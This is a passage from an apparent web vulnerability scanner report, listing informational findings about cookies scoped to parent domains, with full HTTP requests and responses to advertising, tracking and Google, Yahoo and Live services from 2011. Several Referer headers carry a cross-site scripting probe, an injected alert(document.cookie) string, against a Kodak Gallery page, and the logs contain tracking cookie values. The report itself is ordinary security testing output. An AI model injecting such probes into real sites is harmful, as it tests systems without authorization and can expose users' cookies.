Confidence:   Certain
Host:   http://a.triggit.com
Path:   /px

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /px?nosync=1&hn=www.kodakgallery.com&cs=ISO-8859-1&ss=1920x1200&cd=16-bit&lg=en-US&je=1&ti=VisitFlorida%20Vacation%20Photos%20at%20KODAK%20Gallery&rf=http%3A%2F%2Fburp%2Fshow%2F43&ur=http%3A%2F%2Fwww.kodakgallery.com%2Fgallery%2Flp%2F2010%2Fvisit_florida%2Fvacation_photos.jsp%3Fe81c7*%2Falert(document.cookie)%2F%2F4c687dfaa6f%3D1&pl=Win32&ua=Mozilla%2F5.0%20(Windows%20NT%206.1%3B%20WOW64)%20AppleWebKit%2F534.24%20(KHTML%2C%20like%20Gecko)%20Chrome%2F11.0.696.60%20Safari%2F534.24&cb=0.7124078529886901&u=kodak&rtv=1215451620&rtv=Anon&rtv=landing%20page%2Cvisit%20florida HTTP/1.1
Host: a.triggit.com
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trgu=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; trgjs=1

Response

HTTP/1.1 200 OK
Set-Cookie: trgs=320740595; domain=.triggit.com; path=/;
Content-Type: image/gif
P3P: CP="DEVo PSDo OUR BUS DSP ALL COR"
Date: Sat, 30 Apr 2011 15:08:24 GMT
Content-Length: 43

GIF89a.............!.......,...........L..;

13.46. http://ads.adbrite.com/adserver/vdi/711384  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/711384

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/711384?d=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=0.2983929158654064 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; ut="1%3AHYxBDoMgEAD%2FsmcOLiht%2FI0oRtPNWsCWoOvfJV5nJnPCX0N%2FwseXvMUpQQ8hmCMLhreJJFqwU0mniILfMjPLIIj7oRJ5olq5PW%2FyEuuMGheya7EtVzw1v2qlAQVuYPZxfd5wXTc%3D"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 30 Apr 2011 15:08:25 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Sun, 01-May-2011 15:08:25 GMT
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBir0eyREyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; path=/; domain=.adbrite.com; expires=Fri, 29-Jul-2011 15:08:25 GMT
Set-Cookie: ut="1%3AHcxBDoMgEEDRu8yahQNKG28jitF0MhawJeh4d4nb95N%2Fwl9Df8LHl7zFKUEPSaeIgt8yM8sgiPuhQjBHFgxvE0m0YKcSeaIqbs%2BbvMQ6o8aF7Fpsy5Wn5lerNKDADcw%2Brs8brusG"; path=/; domain=.adbrite.com; expires=Tue, 27-Apr-2021 15:08:25 GMT
Set-Cookie: vsd=0@1@4dbc25e9@www.kodakgallery.com; path=/; domain=.adbrite.com; expires=Mon, 02-May-2011 15:08:25 GMT
Set-Cookie: rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; path=/; domain=.adbrite.com; expires=Fri, 29-Jul-2011 15:08:25 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

13.47. https://adwords.google.com/select/Login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /select/Login

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /select/Login HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: I=ZVl0pi8BAAA.9QCH_JbBItRG1yn60m2UCA.7WXTYuIM7_I1d6hmESmc4g; Path=/select; Secure; HttpOnly
Set-Cookie: S=awfe=W5Ox7Wvo_q2RoWATXSD9lQ:awfe-efe=W5Ox7Wvo_q2RoWATXSD9lQ; Domain=.google.com; Path=/; Secure; HttpOnly
Set-Cookie: S_awfe=qpNqRDenTNhWmqSJOzShRA; Domain=.google.com; Path=/; Secure; HttpOnly
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Location: /um/StartNewLogin
Date: Sat, 30 Apr 2011 12:18:53 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="/um/StartNewLogin">here</A>.
</BODY>
</HTML>

13.48. https://adwords.google.com/um/StartNewLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /um/StartNewLogin

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /um/StartNewLogin HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: AdsUserLocale=en; Path=/; Secure
Set-Cookie: SAG=EXPIRED;Path=/;Expires=Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: S=adwords-usermgmt=d2NTU6eMWipPO3ggNY4SrA; Domain=.google.com; Path=/; Secure; HttpOnly
Location: https://www.google.com/accounts/ServiceLogin?service=adwords&hl=en&ltmpl=adwords&passive=true&ifr=false&alwf=true&continue=https://adwords.google.com/um/gaiaauth?apt%3DNone
X-Invoke-Duration: 15
Content-Type: text/html; charset=UTF-8
Date: Sat, 30 Apr 2011 12:18:53 GMT
Expires: Sat, 30 Apr 2011 12:18:53 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/accounts/ServiceLogin?s
...[SNIP]...

13.49. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=1080027723&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Ftn.gov%252F%26jsref%3D%26rnd%3D1304123873055&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Ftn.gov%2F&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Ftn.gov%2F&jsref=&rnd=1304123873055
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sat, 30 Apr 2011 00:37:31 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Mon, 29-Apr-2013 00:37:31 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


13.50. http://bh.contextweb.com/bh/rtset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=530741&ev=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=0.2830617534928024 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2; V=wOebwAz4UvVv; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.0

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web82
Cache-Control: no-cache, no-store
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Tue, 24-Apr-2012 15:08:25 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|530741.c1e1301e-3a1f-4ca7-9870-f636b5f10e66.0|535461.2931142961646634775.1; Domain=.contextweb.com; Expires=Sun, 29-Apr-2012 15:08:25 GMT; Path=/
Content-Type: image/gif
Date: Sat, 30 Apr 2011 15:08:24 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

13.51. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=add&advid=1443&token=NETM7 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2; V=wOebwAz4UvVv; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.0

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web84
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Tue, 24-Apr-2012 15:08:25 GMT; Path=/
Set-Cookie: cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7; Domain=.contextweb.com; Expires=Sun, 03-Apr-2016 15:08:25 GMT; Path=/
Content-Type: image/gif
Date: Sat, 30 Apr 2011 15:08:24 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

13.52. http://blogsearch.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogsearch.google.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: blogsearch.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:19:15 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=5709590221a1f224:TM=1304165955:LM=1304165955:S=iNZcUgSOgqvTQKYz; expires=Mon, 29-Apr-2013 12:19:15 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: bsfe
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta HTTP-EQUIV="content-type" content="text/html; charset=UTF-8"><meta description="Google Blog Search provides fresh, relevant search results from millions of feed-enabled blogs. Users
...[SNIP]...

13.53. http://books.google.com/bkshp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://books.google.com
Path:   /bkshp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bkshp HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:19:15 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=e36f394532d067c7:TM=1304165955:LM=1304165955:S=l9qzxqCpZj00FDw6; expires=Mon, 29-Apr-2013 12:19:15 GMT; path=/; domain=.google.com
Set-Cookie: NID=46=Hb_21DNapDoYwoEnZnmA0fNSixtJgr-c3mI0F09lL3C31SjZW8RyYmhtkN5C3GIAykyFmUASCCADP5lbygjXrZo2Mb2DfP3Q4JJLsfKR8adffrnODC-xwhVYiFRb63yy; expires=Sun, 30-Oct-2011 12:19:15 GMT; path=/; domain=.google.com; HttpOnly
X-Content-Type-Options: nosniff
Server: OFE/0.1
Connection: close

<!DOCTYPE html><html><head><script>(function(){function a(c){this.t={};this.tick=function(c,e,b){b=b!=void 0?b:(new Date).getTime();this.t[c]=[b,e]};this.tick("start",null,c)}var d=new a;window.jstimi
...[SNIP]...

13.54. http://books.google.com/books  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://books.google.com
Path:   /books

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /books HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:19:16 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=126a2d407bee17e8:TM=1304165956:LM=1304165956:S=x4cjRm33Cdhrg9Pd; expires=Mon, 29-Apr-2013 12:19:16 GMT; path=/; domain=.google.com
Set-Cookie: NID=46=oXRFGrGgpA-uJVQm1y8zv-orteWaJLenuLFLLfKqUKQTHYB3Yqgm8SPCW_z5-tQgGekeHuCZV2ZttKNBUIW_gsfmKm55WBgfhpaJ6Hlh0nKdz0rzK7N5kDW1PG_YSBhD; expires=Sun, 30-Oct-2011 12:19:16 GMT; path=/; domain=.google.com; HttpOnly
X-Content-Type-Options: nosniff
Server: OFE/0.1
Connection: close

<!DOCTYPE html><html><head><script>(function(){function a(c){this.t={};this.tick=function(c,e,b){b=b!=void 0?b:(new Date).getTime();this.t[c]=[b,e]};this.tick("start",null,c)}var d=new a;window.jstimi
...[SNIP]...

13.55. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5153469~~0~~~^eb75Per_Played~0~14453476~01010^ebVideoFullPlay~0~14453476~01010^ebAdDuration~189~0~01020^ebAboveTheFoldDuration~189~0~01020^ebVideoPlayDuration~41~0~01010^ebVideoAssetDuration~41~14453476~01010&OptOut=0&ebRandom=0.9262445359490812&flv=10.2154&wmpv=0&res=128&bwVal=737&bwTime=1304165755979 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://io9.com/static/ad_iframe.php?script_url=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fgm.io9%2Ffront%3Bptile%3D3%3Bsz%3D300x250%3Bord%3D96869397%3BmtfIFPath%3D%2Fassets%2Fvendor%2Fdoubleclick%2F%3Borigin%3Dgawker%3Bvisited%3Dio9front%3Bvisited%3Dgawkerfront%3F&rand=96869393&nocache=true
Origin: http://io9.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=f45d7f8d-550c-47b4-99e7-f004537718b33HS0c0; expires=Fri, 29-Jul-2011 08:18:44 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=737&BWDate=40663.346343&debuglevel=&FLV=10.2154&RES=128&WMPV=0; expires=Fri, 29-Jul-2011 08:18:44 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 30 Apr 2011 12:18:44 GMT
Connection: close
Content-Length: 0


13.56. http://del.icio.us/post  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://del.icio.us
Path:   /post

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /post HTTP/1.1
Host: del.icio.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 30 Apr 2011 12:20:04 GMT
Set-Cookie: BX=61ksmkt6rnvjk&b=3&s=6l; expires=Tue, 30-Apr-2013 20:00:00 GMT; path=/; domain=.icio.us
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://www.delicious.com/post
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 162

The document has moved <A HREF="http://www.delicious.com/post">here</A>.<P>
<!-- fe01.web.del.ac4.yahoo.net uncompressed/chunked Sat Apr 30 12:20:04 UTC 2011 -->

13.57. https://favorites.live.com/quickadd.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://favorites.live.com
Path:   /quickadd.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /quickadd.aspx HTTP/1.1
Host: favorites.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://office.live.com/sharefavorite.aspx%2f.SharedFavorites
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: xid=e359122d-0181-486e-a9ac-20d6233faf63&&BAYxxxxxxC636&158; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: mktstate=S=1893731954&U=&E=&P=&B=en; domain=.live.com; path=/
Set-Cookie: mkt1=norm=en; domain=.live.com; path=/
Set-Cookie: mkt2=marketing=en-us; domain=skydrive.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Sat, 30-Apr-2011 10:40:34 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 12:20:34 GMT
Connection: close
Content-Length: 178

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://office.live.com/sharefavorite.aspx%2f.SharedFavorites">here</a>.</h2>
</body></html>

13.58. http://finance.yahoo.com/q  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /q

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /q HTTP/1.1
Host: finance.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:20:34 GMT
Set-Cookie: B=3bnjjep6rnvki&b=3&s=if; expires=Tue, 30-Apr-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Set-Cookie: PRF=; expires=Tue, 27 Apr 2021 05:20:34 GMT; path=/; domain=finance.yahoo.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Connection: close
Server: YTS/1.19.5

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Quotes &
...[SNIP]...

13.59. http://groups.google.com/grphp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /grphp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /grphp HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=c14b1274934572ff:TM=1304166055:LM=1304166055:S=6GKsyI7Du5NAVM93; expires=Mon, 29-Apr-2013 12:20:55 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Sat, 30 Apr 2011 12:20:55 GMT
Server: GWS-GRFE/0.50
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

13.60. http://i.w55c.net/rs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /rs

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rs?id=7d5c82fe65bf4b509737fd10548dc888&t=marketing HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2624116;type=non-s657;cat=unive451;ord=2089402840938.4192?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Mon, 29-Apr-13 15:08:50 GMT
Cache-Control: no-store
X-Powered-By: Mirror Image Internet
P3p: CP="NOI DSP COR NID"
Date: Sat, 30 Apr 2011 15:08:50 GMT
Server: Jetty(6.1.22)
Content-Type: image/gif
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 42

